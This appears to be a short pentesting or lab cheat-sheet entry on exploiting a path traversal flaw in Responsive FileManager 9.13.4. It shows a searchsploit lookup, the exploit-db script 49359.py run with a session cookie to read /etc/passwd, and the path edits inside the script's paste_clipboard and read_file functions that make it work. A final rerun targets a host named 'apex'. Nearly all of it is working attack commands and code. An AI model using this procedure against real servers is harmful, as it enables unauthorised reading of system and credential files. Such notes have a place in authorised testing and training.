Responsive Filemanager
LFI
$ searchsploit responsive file manager 9.13.4
Responsive FileManager 9.13.4 - 'path' Path Traversal | php/webapps/49359.py
$ python3 49359.py http://<target-IP>/filemanager PHPSESSID=<value> /etc/passwd
[*] Copy Clipboard
[-] Paste False
UnboundLocalError: cannot access local variable 'paste_result' where it is not associated with a value
# Check the paths on the below functions
def paste_clipboard(url, session_cookie):
# Changed path
url_paste = "%s/filemanager/execute.php?action=paste_clipboard" % (url)
def read_file(url, file_name):
# Changed path
url_path = "%s/filemanager/Documents/%s" % (url,name_file)
# Successful execution of the PoC will copy the target file within Documents (can be seen on the UI or in an SMB share in case of a PHP file
$ python3 49359.py http://apex PHPSESSID=vk5ofpj43e0ph77modoki4uo1s /etc/passwdLast updated